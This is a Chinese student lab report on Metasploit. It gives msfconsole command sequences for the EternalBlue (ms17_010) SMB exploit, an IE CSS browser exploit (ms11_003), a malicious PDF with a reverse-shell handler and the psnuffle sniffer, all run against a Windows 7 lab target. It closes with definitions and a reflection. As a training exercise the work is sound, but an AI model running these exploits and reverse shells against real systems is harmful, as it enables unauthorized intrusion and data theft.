1. 实践内容
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
1.1一个主动攻击实践,ms17_010; (1分)
-
关闭靶机win7的防火墙
- 查看靶机是否有这个漏洞
msfconsole use auxiliary/scanner/smb/smb_ms17_010 set rhosts 192.168.43.82(靶机IP) exploit
- 用另一台kali进行攻击
use exploit/windows/smb/ms17_010_eternalblue(选择该漏洞) set payload windows/x64/meterpreter/reverse_tcp(设置攻击的载荷) set rhosts 192.168.43.82(靶机IP) set lhosts 192.168.43.96(kaliIP) exploit
- 连接成功后获取shell,输入shell进行验证
1.2 一个针对浏览器的攻击,ms11_003;
- 关闭win7防火墙
- 在msfconsole里搜索漏洞模块
msfconsole
search ms11-003
- 找到后生成攻击网址
use exploit/windows/browser/ms11_003_ie_css_import set payload windows/meterpreter/reverse_tcp show options set srvhost 192.168.43.96(kaliIP) exploit
- 将生成的网址http://192.168.43.96:8080/vlcgEr,在靶机里用ie浏览器打开
- 查看会话(连接后msf里直接看不见,但是创建了会话,可以通过会话进入连接)
sessions sessions 1
- 获取shell,运行命令验证
1.3 一个针对客户端的攻击,如Adobe或office
- 通过msfconsole生成的伪装pdf文件
msfcomsole
use exploit/windows/fileformat/adobe_cooltype_sing(或58)
(设置exploit后,有一行默认payload windows/meterpreter/reverse_tcp,所以payload可以不用设,可以使用默认的)
show options exploit
-
通过局域网共享文件夹,将生成的msf.pdf移动到靶机里
-
在win7中下载Adobe Reader 9.3
-
msf监听
use exploit/windows/multi/handler exploit
-
连接后,获取shell,运行
ipconfig
并验证回连成功
1.4 成功应用任何一个辅助模块,嗅探sniffer。
- 靶机win7
-
msfconsole search sniff use auxiliary/sniffer/psnuffle show options exploit
- 靶机访问www.baidu.com
- kali返回嗅探内容,可以看到嗅探成功
2.问题回答
2.1.基础问题回答
(1)用自己的话解释什么是exploit,payload,encode.
- exploit就是利用一些工具的,用来收集目标靶机的这种漏洞或者个人信息,并可以进行一些比如摄屏、提权等操作。
- payload是在目标主机上创建会话连接的,是一个负载,可以负载程序或者数据等到目标靶机,实现攻击。
- encode是一个加密的工具,可以加密信息或者文件,比如对对payload进行编码加工。
2.2.实践总结与体会
- 本次实验可以说是十分艰难了,主要在环境的配置上,我弄了很长时间才把虚拟机配置好。虽然整体实验流程并不复杂,但是仍然有过好几次失败的尝试。通过这次实验感受到了msf工具功能的强大。
2.3.离实战还缺些什么技术或步骤?
- 我认为离实战还有很远的距离,按照我目前学习到的内容还不能做到随意的入侵别人的计算机。目前缺少如何关闭对方的防火墙;如何把自己的后门文件伪装成功注入对方的计算机中;如何将自己的攻击靶机换为目前更为流行的操作系统,比如win10。.